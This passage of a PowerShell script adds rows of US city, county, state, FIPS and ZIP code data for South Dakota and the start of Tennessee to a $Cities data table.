dakota","SD","46","57072") + $null = $Cities.Rows.Add("Wakonda","Clay","South dakota","SD","46","57073") + $null = $Cities.Rows.Add("Ward","Moody","South dakota","SD","46","57074") + $null = $Cities.Rows.Add("Wentworth","Lake","South dakota","SD","46","57075") + $null = $Cities.Rows.Add("Winfred","Lake","South dakota","SD","46","57076") + $null = $Cities.Rows.Add("Worthing","Lincoln","South dakota","SD","46","57077") + $null = $Cities.Rows.Add("Yankton","Yankton","South dakota","SD","46","57078") + $null = $Cities.Rows.Add("Zcta 570hh","Bon Homme","South dakota","SD","46","570HH") + $null = $Cities.Rows.Add("Sioux falls","Minnehaha","South dakota","SD","46","57103") + $null = $Cities.Rows.Add("Sioux falls","Minnehaha","South dakota","SD","46","57104") + $null = $Cities.Rows.Add("Sioux falls","Minnehaha","South dakota","SD","46","57105") + $null = $Cities.Rows.Add("Sioux falls","Minnehaha","South dakota","SD","46","57106") + $null = $Cities.Rows.Add("Sioux falls","Minnehaha","South dakota","SD","46","57107") + $null = $Cities.Rows.Add("Zcta 57108","Lincoln","South dakota","SD","46","57108") + $null = $Cities.Rows.Add("Zcta 57110","Minnehaha","South dakota","SD","46","57110") + $null = $Cities.Rows.Add("Watertown","Codington","South dakota","SD","46","57201") + $null = $Cities.Rows.Add("Arlington","Kingsbury","South dakota","SD","46","57212") + $null = $Cities.Rows.Add("Astoria","Deuel","South dakota","SD","46","57213") + $null = $Cities.Rows.Add("Badger","Kingsbury","South dakota","SD","46","57214") + $null = $Cities.Rows.Add("Big stone city","Grant","South dakota","SD","46","57216") + $null = $Cities.Rows.Add("Bradley","Clark","South dakota","SD","46","57217") + $null = $Cities.Rows.Add("Brandt","Deuel","South dakota","SD","46","57218") + $null = $Cities.Rows.Add("Butler","Day","South dakota","SD","46","57219") + $null = $Cities.Rows.Add("Bruce","Brookings","South dakota","SD","46","57220") + $null = $Cities.Rows.Add("Bryant","Hamlin","South dakota","SD","46","57221") + $null = $Cities.Rows.Add("Castlewood","Hamlin","South dakota","SD","46","57223") + $null = $Cities.Rows.Add("Claire city","Roberts","South dakota","SD","46","57224") + $null = $Cities.Rows.Add("Clark","Clark","South dakota","SD","46","57225") + $null = $Cities.Rows.Add("Altamont","Deuel","South dakota","SD","46","57226") + $null = $Cities.Rows.Add("Corona","Roberts","South dakota","SD","46","57227") + $null = $Cities.Rows.Add("De smet","Kingsbury","South dakota","SD","46","57231") + $null = $Cities.Rows.Add("Eden","Marshall","South dakota","SD","46","57232") + $null = $Cities.Rows.Add("Erwin","Kingsbury","South dakota","SD","46","57233") + $null = $Cities.Rows.Add("Dempster","Hamlin","South dakota","SD","46","57234") + $null = $Cities.Rows.Add("Florence","Codington","South dakota","SD","46","57235") + $null = $Cities.Rows.Add("Garden city","Clark","South dakota","SD","46","57236") + $null = $Cities.Rows.Add("Gary","Deuel","South dakota","SD","46","57237") + $null = $Cities.Rows.Add("Bemis","Deuel","South dakota","SD","46","57238") + $null = $Cities.Rows.Add("Grenville","Day","South dakota","SD","46","57239") + $null = $Cities.Rows.Add("Hayti","Hamlin","South dakota","SD","46","57241") + $null = $Cities.Rows.Add("Hazel","Hamlin","South dakota","SD","46","57242") + $null = $Cities.Rows.Add("Henry","Codington","South dakota","SD","46","57243") + $null = $Cities.Rows.Add("Hetland","Kingsbury","South dakota","SD","46","57244") + $null = $Cities.Rows.Add("Kranzburg","Codington","South dakota","SD","46","57245") + $null = $Cities.Rows.Add("Labolt","Grant","South dakota","SD","46","57246") + $null = $Cities.Rows.Add("Lake city","Marshall","South dakota","SD","46","57247") + $null = $Cities.Rows.Add("Lake norden","Hamlin","South dakota","SD","46","57248") + $null = $Cities.Rows.Add("Lake preston","Kingsbury","South dakota","SD","46","57249") + $null = $Cities.Rows.Add("Marvin","Grant","South dakota","SD","46","57251") + $null = $Cities.Rows.Add("Milbank","Grant","South dakota","SD","46","57252") + $null = $Cities.Rows.Add("New effington","Roberts","South dakota","SD","46","57255") + $null = $Cities.Rows.Add("Ortley","Grant","South dakota","SD","46","57256") + $null = $Cities.Rows.Add("Peever","Roberts","South dakota","SD","46","57257") + $null = $Cities.Rows.Add("Raymond","Clark","South dakota","SD","46","57258") + $null = $Cities.Rows.Add("Albee","Grant","South dakota","SD","46","57259") + $null = $Cities.Rows.Add("Rosholt","Roberts","South dakota","SD","46","57260") + $null = $Cities.Rows.Add("Roslyn","Day","South dakota","SD","46","57261") + $null = $Cities.Rows.Add("Agency village","Roberts","South dakota","SD","46","57262") + $null = $Cities.Rows.Add("South shore","Codington","South dakota","SD","46","57263") + $null = $Cities.Rows.Add("Stockholm","Grant","South dakota","SD","46","57264") + $null = $Cities.Rows.Add("Strandburg","Grant","South dakota","SD","46","57265") + $null = $Cities.Rows.Add("Summit","Roberts","South dakota","SD","46","57266") + $null = $Cities.Rows.Add("Toronto","Deuel","South dakota","SD","46","57268") + $null = $Cities.Rows.Add("Twin brooks","Grant","South dakota","SD","46","57269") + $null = $Cities.Rows.Add("Veblen","Marshall","South dakota","SD","46","57270") + $null = $Cities.Rows.Add("Vienna","Clark","South dakota","SD","46","57271") + $null = $Cities.Rows.Add("Wallace","Codington","South dakota","SD","46","57272") + $null = $Cities.Rows.Add("Waubay","Day","South dakota","SD","46","57273") + $null = $Cities.Rows.Add("Lily","Day","South dakota","SD","46","57274") + $null = $Cities.Rows.Add("White","Brookings","South dakota","SD","46","57276") + $null = $Cities.Rows.Add("Willow lake","Clark","South dakota","SD","46","57278") + $null = $Cities.Rows.Add("Wilmot","Roberts","South dakota","SD","46","57279") + $null = $Cities.Rows.Add("Zcta 572hh","Brookings","South dakota","SD","46","572HH") + $null = $Cities.Rows.Add("Loomis","Davison","South dakota","SD","46","57301") + $null = $Cities.Rows.Add("Farmer","Hanson","South dakota","SD","46","57311") + $null = $Cities.Rows.Add("Alpena","Jerauld","South dakota","SD","46","57312") + $null = $Cities.Rows.Add("Armour","Douglas","South dakota","SD","46","57313") + $null = $Cities.Rows.Add("Forestburg","Sanborn","South dakota","SD","46","57314") + $null = $Cities.Rows.Add("Avon","Bon Homme","South dakota","SD","46","57315") + $null = $Cities.Rows.Add("Bonesteel","Gregory","South dakota","SD","46","57317") + $null = $Cities.Rows.Add("Dolton","McCook","South dakota","SD","46","57319") + $null = $Cities.Rows.Add("Canova","Miner","South dakota","SD","46","57321") + $null = $Cities.Rows.Add("Carpenter","Clark","South dakota","SD","46","57322") + $null = $Cities.Rows.Add("Carthage","Miner","South dakota","SD","46","57323") + $null = $Cities.Rows.Add("Cavour","Beadle","South dakota","SD","46","57324") + $null = $Cities.Rows.Add("Chamberlain","Brule","South dakota","SD","46","57325") + $null = $Cities.Rows.Add("Corsica","Douglas","South dakota","SD","46","57328") + $null = $Cities.Rows.Add("Dante","Charles Mix","South dakota","SD","46","57329") + $null = $Cities.Rows.Add("Delmont","Douglas","South dakota","SD","46","57330") + $null = $Cities.Rows.Add("Dimock","Hutchinson","South dakota","SD","46","57331") + $null = $Cities.Rows.Add("Emery","Hanson","South dakota","SD","46","57332") + $null = $Cities.Rows.Add("Ethan","Davison","South dakota","SD","46","57334") + $null = $Cities.Rows.Add("Fairfax","Gregory","South dakota","SD","46","57335") + $null = $Cities.Rows.Add("Fedora","Miner","South dakota","SD","46","57337") + $null = $Cities.Rows.Add("Fort thompson","Buffalo","South dakota","SD","46","57339") + $null = $Cities.Rows.Add("Fulton","Hanson","South dakota","SD","46","57340") + $null = $Cities.Rows.Add("Gann valley","Buffalo","South dakota","SD","46","57341") + $null = $Cities.Rows.Add("Geddes","Charles Mix","South dakota","SD","46","57342") + $null = $Cities.Rows.Add("Harrison","Douglas","South dakota","SD","46","57344") + $null = $Cities.Rows.Add("Highmore","Hyde","South dakota","SD","46","57345") + $null = $Cities.Rows.Add("Stephan","Hyde","South dakota","SD","46","57346") + $null = $Cities.Rows.Add("Hitchcock","Beadle","South dakota","SD","46","57348") + $null = $Cities.Rows.Add("Roswell","Miner","South dakota","SD","46","57349") + $null = $Cities.Rows.Add("Huron","Beadle","South dakota","SD","46","57350") + $null = $Cities.Rows.Add("Iroquois","Kingsbury","South dakota","SD","46","57353") + $null = $Cities.Rows.Add("Kimball","Brule","South dakota","SD","46","57355") + $null = $Cities.Rows.Add("Lake andes","Charles Mix","South dakota","SD","46","57356") + $null = $Cities.Rows.Add("Lane","Jerauld","South dakota","SD","46","57358") + $null = $Cities.Rows.Add("Letcher","Sanborn","South dakota","SD","46","57359") + $null = $Cities.Rows.Add("Marty","Charles Mix","South dakota","SD","46","57361") + $null = $Cities.Rows.Add("Miller","Hand","South dakota","SD","46","57362") + $null = $Cities.Rows.Add("Mount vernon","Davison","South dakota","SD","46","57363") + $null = $Cities.Rows.Add("New holland","Douglas","South dakota","SD","46","57364") + $null = $Cities.Rows.Add("Oacoma","Lyman","South dakota","SD","46","57365") + $null = $Cities.Rows.Add("Parkston","Hutchinson","South dakota","SD","46","57366") + $null = $Cities.Rows.Add("Pickstown","Charles Mix","South dakota","SD","46","57367") + $null = $Cities.Rows.Add("Plankinton","Aurora","South dakota","SD","46","57368") + $null = $Cities.Rows.Add("Academy","Charles Mix","South dakota","SD","46","57369") + $null = $Cities.Rows.Add("Pukwana","Brule","South dakota","SD","46","57370") + $null = $Cities.Rows.Add("Ree heights","Hand","South dakota","SD","46","57371") + $null = $Cities.Rows.Add("Saint lawrence","Hand","South dakota","SD","46","57373") + $null = $Cities.Rows.Add("Spencer","McCook","South dakota","SD","46","57374") + $null = $Cities.Rows.Add("Stickney","Aurora","South dakota","SD","46","57375") + $null = $Cities.Rows.Add("Tripp","Hutchinson","South dakota","SD","46","57376") + $null = $Cities.Rows.Add("Virgil","Beadle","South dakota","SD","46","57379") + $null = $Cities.Rows.Add("Wagner","Charles Mix","South dakota","SD","46","57380") + $null = $Cities.Rows.Add("Wessington","Beadle","South dakota","SD","46","57381") + $null = $Cities.Rows.Add("Wessington sprin","Jerauld","South dakota","SD","46","57382") + $null = $Cities.Rows.Add("White lake","Aurora","South dakota","SD","46","57383") + $null = $Cities.Rows.Add("Wolsey","Beadle","South dakota","SD","46","57384") + $null = $Cities.Rows.Add("Woonsocket","Sanborn","South dakota","SD","46","57385") + $null = $Cities.Rows.Add("Yale","Beadle","South dakota","SD","46","57386") + $null = $Cities.Rows.Add("Zcta 573hh","Brule","South dakota","SD","46","573HH") + $null = $Cities.Rows.Add("Aberdeen","Brown","South dakota","SD","46","57401") + $null = $Cities.Rows.Add("Akaska","Walworth","South dakota","SD","46","57420") + $null = $Cities.Rows.Add("Amherst","Marshall","South dakota","SD","46","57421") + $null = $Cities.Rows.Add("Andover","Day","South dakota","SD","46","57422") + $null = $Cities.Rows.Add("Athol","Spink","South dakota","SD","46","57424") + $null = $Cities.Rows.Add("Barnard","Brown","South dakota","SD","46","57426") + $null = $Cities.Rows.Add("Bath","Brown","South dakota","SD","46","57427") + $null = $Cities.Rows.Add("Bowdle","Edmunds","South dakota","SD","46","57428") + $null = $Cities.Rows.Add("Britton","Marshall","South dakota","SD","46","57430") + $null = $Cities.Rows.Add("Claremont","Brown","South dakota","SD","46","57432") + $null = $Cities.Rows.Add("Columbia","Brown","South dakota","SD","46","57433") + $null = $Cities.Rows.Add("Verdon","Spink","South dakota","SD","46","57434") + $null = $Cities.Rows.Add("Cresbard","Faulk","South dakota","SD","46","57435") + $null = $Cities.Rows.Add("Doland","Spink","South dakota","SD","46","57436") + $null = $Cities.Rows.Add("Artas","McPherson","South dakota","SD","46","57437") + $null = $Cities.Rows.Add("Miranda","Faulk","South dakota","SD","46","57438") + $null = $Cities.Rows.Add("Frankfort","Spink","South dakota","SD","46","57440") + $null = $Cities.Rows.Add("Frederick","Brown","South dakota","SD","46","57441") + $null = $Cities.Rows.Add("Gettysburg","Potter","South dakota","SD","46","57442") + $null = $Cities.Rows.Add("Groton","Brown","South dakota","SD","46","57445") + $null = $Cities.Rows.Add("Hecla","Brown","South dakota","SD","46","57446") + $null = $Cities.Rows.Add("Hosmer","Edmunds","South dakota","SD","46","57448") + $null = $Cities.Rows.Add("Houghton","Brown","South dakota","SD","46","57449") + $null = $Cities.Rows.Add("Hoven","Potter","South dakota","SD","46","57450") + $null = $Cities.Rows.Add("Ipswich","Edmunds","South dakota","SD","46","57451") + $null = $Cities.Rows.Add("Java","Walworth","South dakota","SD","46","57452") + $null = $Cities.Rows.Add("Langford","Marshall","South dakota","SD","46","57454") + $null = $Cities.Rows.Add("Lebanon","Potter","South dakota","SD","46","57455") + $null = $Cities.Rows.Add("Leola","McPherson","South dakota","SD","46","57456") + $null = $Cities.Rows.Add("Longlake","McPherson","South dakota","SD","46","57457") + $null = $Cities.Rows.Add("Mansfield","Brown","South dakota","SD","46","57460") + $null = $Cities.Rows.Add("Mellette","Spink","South dakota","SD","46","57461") + $null = $Cities.Rows.Add("Mina","Edmunds","South dakota","SD","46","57462") + $null = $Cities.Rows.Add("Northville","Spink","South dakota","SD","46","57465") + $null = $Cities.Rows.Add("Onaka","Faulk","South dakota","SD","46","57466") + $null = $Cities.Rows.Add("Orient","Hand","South dakota","SD","46","57467") + $null = $Cities.Rows.Add("Pierpont","Day","South dakota","SD","46","57468") + $null = $Cities.Rows.Add("Redfield","Spink","South dakota","SD","46","57469") + $null = $Cities.Rows.Add("Rockham","Faulk","South dakota","SD","46","57470") + $null = $Cities.Rows.Add("Roscoe","Edmunds","South dakota","SD","46","57471") + $null = $Cities.Rows.Add("Selby","Walworth","South dakota","SD","46","57472") + $null = $Cities.Rows.Add("Seneca","Faulk","South dakota","SD","46","57473") + $null = $Cities.Rows.Add("Stratford","Brown","South dakota","SD","46","57474") + $null = $Cities.Rows.Add("Tolstoy","Potter","South dakota","SD","46","57475") + $null = $Cities.Rows.Add("Tulare","Spink","South dakota","SD","46","57476") + $null = $Cities.Rows.Add("Turton","Spink","South dakota","SD","46","57477") + $null = $Cities.Rows.Add("Warner","Brown","South dakota","SD","46","57479") + $null = $Cities.Rows.Add("Wetonka","Brown","South dakota","SD","46","57481") + $null = $Cities.Rows.Add("Zcta 574hh","Potter","South dakota","SD","46","574HH") + $null = $Cities.Rows.Add("Pierre","Hughes","South dakota","SD","46","57501") + $null = $Cities.Rows.Add("Agar","Sully","South dakota","SD","46","57520") + $null = $Cities.Rows.Add("Belvidere","Jackson","South dakota","SD","46","57521") + $null = $Cities.Rows.Add("Blunt","Hughes","South dakota","SD","46","57522") + $null = $Cities.Rows.Add("Lucas","Gregory","South dakota","SD","46","57523") + $null = $Cities.Rows.Add("Carter","Todd","South dakota","SD","46","57526") + $null = $Cities.Rows.Add("Colome","Tripp","South dakota","SD","46","57528") + $null = $Cities.Rows.Add("Dallas","Gregory","South dakota","SD","46","57529") + $null = $Cities.Rows.Add("Draper","Jones","South dakota","SD","46","57531") + $null = $Cities.Rows.Add("Fort pierre","Stanley","South dakota","SD","46","57532") + $null = $Cities.Rows.Add("Dixon","Gregory","South dakota","SD","46","57533") + $null = $Cities.Rows.Add("Hamill","Tripp","South dakota","SD","46","57534") + $null = $Cities.Rows.Add("Harrold","Hughes","South dakota","SD","46","57536") + $null = $Cities.Rows.Add("Hayes","Stanley","South dakota","SD","46","57537") + $null = $Cities.Rows.Add("Herrick","Gregory","South dakota","SD","46","57538") + $null = $Cities.Rows.Add("Holabird","Hyde","South dakota","SD","46","57540") + $null = $Cities.Rows.Add("Ideal","Tripp","South dakota","SD","46","57541") + $null = $Cities.Rows.Add("Iona","Lyman","South dakota","SD","46","57542") + $null = $Cities.Rows.Add("Kadoka","Jackson","South dakota","SD","46","57543") + $null = $Cities.Rows.Add("Kennebec","Lyman","South dakota","SD","46","57544") + $null = $Cities.Rows.Add("Long valley","Jackson","South dakota","SD","46","57547") + $null = $Cities.Rows.Add("Lower brule","Lyman","South dakota","SD","46","57548") + $null = $Cities.Rows.Add("Vetal","Bennett","South dakota","SD","46","57551") + $null = $Cities.Rows.Add("Ottumwa","Haakon","South dakota","SD","46","57552") + $null = $Cities.Rows.Add("Milesville","Haakon","South dakota","SD","46","57553") + $null = $Cities.Rows.Add("Mission","Todd","South dakota","SD","46","57555") + $null = $Cities.Rows.Add("Murdo","Jones","South dakota","SD","46","57559") + $null = $Cities.Rows.Add("Norris","Mellette","South dakota","SD","46","57560") + $null = $Cities.Rows.Add("Okaton","Jones","South dakota","SD","46","57562") + $null = $Cities.Rows.Add("Okreek","Todd","South dakota","SD","46","57563") + $null = $Cities.Rows.Add("Onida","Sully","South dakota","SD","46","57564") + $null = $Cities.Rows.Add("Parmelee","Todd","South dakota","SD","46","57566") + $null = $Cities.Rows.Add("Philip","Haakon","South dakota","SD","46","57567") + $null = $Cities.Rows.Add("Presho","Lyman","South dakota","SD","46","57568") + $null = $Cities.Rows.Add("Reliance","Lyman","South dakota","SD","46","57569") + $null = $Cities.Rows.Add("Rosebud","Todd","South dakota","SD","46","57570") + $null = $Cities.Rows.Add("Saint charles","Gregory","South dakota","SD","46","57571") + $null = $Cities.Rows.Add("Saint francis","Todd","South dakota","SD","46","57572") + $null = $Cities.Rows.Add("Tuthill","Bennett","South dakota","SD","46","57574") + $null = $Cities.Rows.Add("Vivian","Lyman","South dakota","SD","46","57576") + $null = $Cities.Rows.Add("Wanblee","Jackson","South dakota","SD","46","57577") + $null = $Cities.Rows.Add("Wewela","Tripp","South dakota","SD","46","57578") + $null = $Cities.Rows.Add("White river","Mellette","South dakota","SD","46","57579") + $null = $Cities.Rows.Add("Clearfield","Tripp","South dakota","SD","46","57580") + $null = $Cities.Rows.Add("Witten","Tripp","South dakota","SD","46","57584") + $null = $Cities.Rows.Add("Wood","Mellette","South dakota","SD","46","57585") + $null = $Cities.Rows.Add("Zcta 575hh","Gregory","South dakota","SD","46","575HH") + $null = $Cities.Rows.Add("Zcta 575xx","Mellette","South dakota","SD","46","575XX") + $null = $Cities.Rows.Add("Mobridge","Walworth","South dakota","SD","46","57601") + $null = $Cities.Rows.Add("Bison","Perkins","South dakota","SD","46","57620") + $null = $Cities.Rows.Add("Walker","Corson","South dakota","SD","46","57621") + $null = $Cities.Rows.Add("Cherry creek","Ziebach","South dakota","SD","46","57622") + $null = $Cities.Rows.Add("Dupree","Ziebach","South dakota","SD","46","57623") + $null = $Cities.Rows.Add("Eagle butte","Dewey","South dakota","SD","46","57625") + $null = $Cities.Rows.Add("Faith","Meade","South dakota","SD","46","57626") + $null = $Cities.Rows.Add("Firesteel","Corson","South dakota","SD","46","57628") + $null = $Cities.Rows.Add("Glenham","Walworth","South dakota","SD","46","57631") + $null = $Cities.Rows.Add("Herreid","Campbell","South dakota","SD","46","57632") + $null = $Cities.Rows.Add("Isabel","Dewey","South dakota","SD","46","57633") + $null = $Cities.Rows.Add("Keldron","Corson","South dakota","SD","46","57634") + $null = $Cities.Rows.Add("Lantry","Dewey","South dakota","SD","46","57636") + $null = $Cities.Rows.Add("Lemmon","Perkins","South dakota","SD","46","57638") + $null = $Cities.Rows.Add("Lodgepole","Perkins","South dakota","SD","46","57640") + $null = $Cities.Rows.Add("Mc intosh","Corson","South dakota","SD","46","57641") + $null = $Cities.Rows.Add("Mc laughlin","Corson","South dakota","SD","46","57642") + $null = $Cities.Rows.Add("Meadow","Perkins","South dakota","SD","46","57644") + $null = $Cities.Rows.Add("Morristown","Corson","South dakota","SD","46","57645") + $null = $Cities.Rows.Add("Mound city","Campbell","South dakota","SD","46","57646") + $null = $Cities.Rows.Add("Pollock","Campbell","South dakota","SD","46","57648") + $null = $Cities.Rows.Add("Prairie city","Perkins","South dakota","SD","46","57649") + $null = $Cities.Rows.Add("Ralph","Harding","South dakota","SD","46","57650") + $null = $Cities.Rows.Add("Reva","Harding","South dakota","SD","46","57651") + $null = $Cities.Rows.Add("La plant","Dewey","South dakota","SD","46","57652") + $null = $Cities.Rows.Add("Shadehill","Perkins","South dakota","SD","46","57653") + $null = $Cities.Rows.Add("Timber lake","Dewey","South dakota","SD","46","57656") + $null = $Cities.Rows.Add("Trail city","Corson","South dakota","SD","46","57657") + $null = $Cities.Rows.Add("Wakpala","Corson","South dakota","SD","46","57658") + $null = $Cities.Rows.Add("Watauga","Corson","South dakota","SD","46","57660") + $null = $Cities.Rows.Add("Whitehorse","Dewey","South dakota","SD","46","57661") + $null = $Cities.Rows.Add("Zcta 576hh","Campbell","South dakota","SD","46","576HH") + $null = $Cities.Rows.Add("Rockerville","Pennington","South dakota","SD","46","57701") + $null = $Cities.Rows.Add("Silver city","Pennington","South dakota","SD","46","57702") + $null = $Cities.Rows.Add("Zcta 57703","Pennington","South dakota","SD","46","57703") + $null = $Cities.Rows.Add("Ellsworth afb","Meade","South dakota","SD","46","57706") + $null = $Cities.Rows.Add("Allen","Bennett","South dakota","SD","46","57714") + $null = $Cities.Rows.Add("Denby","Shannon","South dakota","SD","46","57716") + $null = $Cities.Rows.Add("Belle fourche","Butte","South dakota","SD","46","57717") + $null = $Cities.Rows.Add("Black hawk","Meade","South dakota","SD","46","57718") + $null = $Cities.Rows.Add("Box elder","Pennington","South dakota","SD","46","57719") + $null = $Cities.Rows.Add("Buffalo","Harding","South dakota","SD","46","57720") + $null = $Cities.Rows.Add("Buffalo gap","Custer","South dakota","SD","46","57722") + $null = $Cities.Rows.Add("Sky ranch","Harding","South dakota","SD","46","57724") + $null = $Cities.Rows.Add("Caputa","Pennington","South dakota","SD","46","57725") + $null = $Cities.Rows.Add("Creighton","Pennington","South dakota","SD","46","57729") + $null = $Cities.Rows.Add("Crazy horse","Custer","South dakota","SD","46","57730") + $null = $Cities.Rows.Add("Deadwood","Lawrence","South dakota","SD","46","57732") + $null = $Cities.Rows.Add("Edgemont","Fall River","South dakota","SD","46","57735") + $null = $Cities.Rows.Add("Elm springs","Meade","South dakota","SD","46","57736") + $null = $Cities.Rows.Add("Enning","Meade","South dakota","SD","46","57737") + $null = $Cities.Rows.Add("Fairburn","Custer","South dakota","SD","46","57738") + $null = $Cities.Rows.Add("Fruitdale","Butte","South dakota","SD","46","57742") + $null = $Cities.Rows.Add("Hermosa","Custer","South dakota","SD","46","57744") + $null = $Cities.Rows.Add("Hill city","Pennington","South dakota","SD","46","57745") + $null = $Cities.Rows.Add("Hot springs","Fall River","South dakota","SD","46","57747") + $null = $Cities.Rows.Add("Plainview","Ziebach","South dakota","SD","46","57748") + $null = $Cities.Rows.Add("Interior","Jackson","South dakota","SD","46","57750") + $null = $Cities.Rows.Add("Keystone","Pennington","South dakota","SD","46","57751") + $null = $Cities.Rows.Add("Kyle","Shannon","South dakota","SD","46","57752") + $null = $Cities.Rows.Add("Spearfish canyon","Lawrence","South dakota","SD","46","57754") + $null = $Cities.Rows.Add("Ludlow","Harding","South dakota","SD","46","57755") + $null = $Cities.Rows.Add("Manderson","Shannon","South dakota","SD","46","57756") + $null = $Cities.Rows.Add("Mud butte","Meade","South dakota","SD","46","57758") + $null = $Cities.Rows.Add("Nemo","Lawrence","South dakota","SD","46","57759") + $null = $Cities.Rows.Add("Newell","Butte","South dakota","SD","46","57760") + $null = $Cities.Rows.Add("New underwood","Pennington","South dakota","SD","46","57761") + $null = $Cities.Rows.Add("Nisland","Butte","South dakota","SD","46","57762") + $null = $Cities.Rows.Add("Oelrichs","Fall River","South dakota","SD","46","57763") + $null = $Cities.Rows.Add("Oglala","Shannon","South dakota","SD","46","57764") + $null = $Cities.Rows.Add("Opal","Meade","South dakota","SD","46","57765") + $null = $Cities.Rows.Add("Oral","Fall River","South dakota","SD","46","57766") + $null = $Cities.Rows.Add("Owanka","Pennington","South dakota","SD","46","57767") + $null = $Cities.Rows.Add("Piedmont","Meade","South dakota","SD","46","57769") + $null = $Cities.Rows.Add("Pine ridge","Shannon","South dakota","SD","46","57770") + $null = $Cities.Rows.Add("Porcupine","Shannon","South dakota","SD","46","57772") + $null = $Cities.Rows.Add("Pringle","Custer","South dakota","SD","46","57773") + $null = $Cities.Rows.Add("Provo","Fall River","South dakota","SD","46","57774") + $null = $Cities.Rows.Add("Cottonwood","Pennington","South dakota","SD","46","57775") + $null = $Cities.Rows.Add("Redowl","Meade","South dakota","SD","46","57777") + $null = $Cities.Rows.Add("Rochford","Pennington","South dakota","SD","46","57778") + $null = $Cities.Rows.Add("Saint onge","Lawrence","South dakota","SD","46","57779") + $null = $Cities.Rows.Add("Scenic","Pennington","South dakota","SD","46","57780") + $null = $Cities.Rows.Add("Spearfish","Lawrence","South dakota","SD","46","57783") + $null = $Cities.Rows.Add("Hereford","Meade","South dakota","SD","46","57785") + $null = $Cities.Rows.Add("Stoneville","Meade","South dakota","SD","46","57787") + $null = $Cities.Rows.Add("Vale","Butte","South dakota","SD","46","57788") + $null = $Cities.Rows.Add("Wall","Pennington","South dakota","SD","46","57790") + $null = $Cities.Rows.Add("Wasta","Pennington","South dakota","SD","46","57791") + $null = $Cities.Rows.Add("White owl","Meade","South dakota","SD","46","57792") + $null = $Cities.Rows.Add("Whitewood","Lawrence","South dakota","SD","46","57793") + $null = $Cities.Rows.Add("Wounded knee","Shannon","South dakota","SD","46","57794") + $null = $Cities.Rows.Add("Black hills stat","Lawrence","South dakota","SD","46","57799") + $null = $Cities.Rows.Add("Zcta 577hh","Meade","South dakota","SD","46","577HH") + $null = $Cities.Rows.Add("","Shannon","South dakota","SD","46","69337") + $null = $Cities.Rows.Add("Adams","Montgomery","Tennessee","TN","47","37010") + $null = $Cities.Rows.Add("Alexandria","DeKalb","Tennessee","TN","47","37012") + $null = $Cities.Rows.Add("Antioch","Davidson","Tennessee","TN","47","37013") + $null = $Cities.Rows.Add("Arrington","Williamson","Tennessee","TN","47","37014") + $null = $Cities.Rows.Add("Ashland city","Cheatham","Tennessee","TN","47","37015") + $null = $Cities.Rows.Add("Auburntown","Cannon","Tennessee","TN","47","37016") + $null = $Cities.Rows.Add("Beechgrove","Coffee","Tennessee","TN","47","37018") + $null = $Cities.Rows.Add("Belfast","Marshall","Tennessee","TN","47","37019") + $null = $Cities.Rows.Add("Bell buckle","Bedford","Tennessee","TN","47","37020") + $null = $Cities.Rows.Add("Bethpage","Sumner","Tennessee","TN","47","37022") + $null = $Cities.Rows.Add("Big rock","Stewart","Tennessee","TN","47","37023") + $null = $Cities.Rows.Add("Bon aqua","Hickman","Tennessee","TN","47","37025") + $null = $Cities.Rows.Add("Bradyville","Cannon","Tennessee","TN","47","37026") + $null = $Cities.Rows.Add("Brentwood","Williamson","Tennessee","TN","47","37027") + $null = $Cities.Rows.Add("Bumpus mills","Stewart","Tennessee","TN","47","37028") + $null = $Cities.Rows.Add("Burns","Dickson","Tennessee","TN","47","37029") + $null = $Cities.Rows.Add("Defeated","Smith","Tennessee","TN","47","37030") + $null = $Cities.Rows.Add("Castalian spring","Sumner","Tennessee","TN","47","37031") + $null = $Cities.Rows.Add("Cedar hill","Robertson","Tennessee","TN","47","37032") + $null = $Cities.Rows.Add("Centerville","Hickman","Tennessee","TN","47","37033") + $null = $Cities.Rows.Add("Chapel hill","Marshall","Tennessee","TN","47","37034") + $null = $Cities.Rows.Add("Chapmansboro","Cheatham","Tennessee","TN","47","37035") + $null = $Cities.Rows.Add("Charlotte","Dickson","Tennessee","TN","47","37036") + $null = $Cities.Rows.Add("Christiana","Rutherford","Tennessee","TN","47","37037") + $null = $Cities.Rows.Add("Clarksville","Montgomery","Tennessee","TN","47","37040") + $null = $Cities.Rows.Add("Clarksville","Montgomery","Tennessee","TN","47","37042") + $null = $Cities.Rows.Add("Clarksville","Montgomery","Tennessee","TN","47","37043") + $null = $Cities.Rows.Add("College grove","Williamson","Tennessee","TN","47","37046") + $null = $Cities.Rows.Add("Cornersville","Marshall","Tennessee","TN","47","37047") + $null = $Cities.Rows.Add("Cottontown","Sumner","Tennessee","TN","47","37048") + $null = $Cities.Rows.Add("Cross plains","Robertson","Tennessee","TN","47","37049") + $null = $Cities.Rows.Add("Cumberland city","Stewart","Tennessee","TN","47","37050") + $null = $Cities.Rows.Add("Cumberland furna","Dickson","Tennessee","TN","47","37051") + $null = $Cities.Rows.Add("Cunningham","Montgomery","Tennessee","TN","47","37052") + $null = $Cities.Rows.Add("Dickson","Dickson","Tennessee","TN","47","37055") + $null = $Cities.Rows.Add("Dixon springs","Macon","Tennessee","TN","47","37057") + $null = $Cities.Rows.Add("Dover","Stewart","Tennessee","TN","47","37058") + $null = $Cities.Rows.Add("Dowelltown","DeKalb","Tennessee","TN","47","37059") + $null = $Cities.Rows.Add("Eagleville","Rutherford","Tennessee","TN","47","37060") + $null = $Cities.Rows.Add("Erin","Houston","Tennessee","TN","47","37061") + $null = $Cities.Rows.Add("Fairview","Williamson","Tennessee","TN","47","37062") + $null = $Cities.Rows.Add("Franklin","Williamson","Tennessee","TN","47","37064") + $null = $Cities.Rows.Add("Gallatin","Sumner","Tennessee","TN","47","37066") + $null = $Cities.Rows.Add("Zcta 37067","Williamson","Tennessee","TN","47","37067") + $null = $Cities.Rows.Add("Zcta 37069","Williamson","Tennessee","TN","47","37069") + $null = $Cities.Rows.Add("Goodlettsville","Davidson","Tennessee","TN","47","37072") + $null = $Cities.Rows.Add("Greenbrier","Robertson","Tennessee","TN","47","37073") + $null = $Cities.Rows.Add("Hartsville","Trousdale","Tennessee","TN","47","37074") + $null = $Cities.Rows.Add("Hendersonville","Sumner","Tennessee","TN","47","37075") + $null = $Cities.Rows.Add("Hermitage","Davidson","Tennessee","TN","47","37076") + $null = $Cities.Rows.Add("Hurricane mills","Humphreys","Tennessee","TN","47","37078") + $null = $Cities.Rows.Add("Indian mound","Stewart","Tennessee","TN","47","37079") + $null = $Cities.Rows.Add("Joelton","Davidson","Tennessee","TN","47","37080") + $null = $Cities.Rows.Add("Kingston springs","Cheatham","Tennessee","TN","47","37082") + $null = $Cities.Rows.Add("Lafayette","Macon","Tennessee","TN","47","37083") + $null = 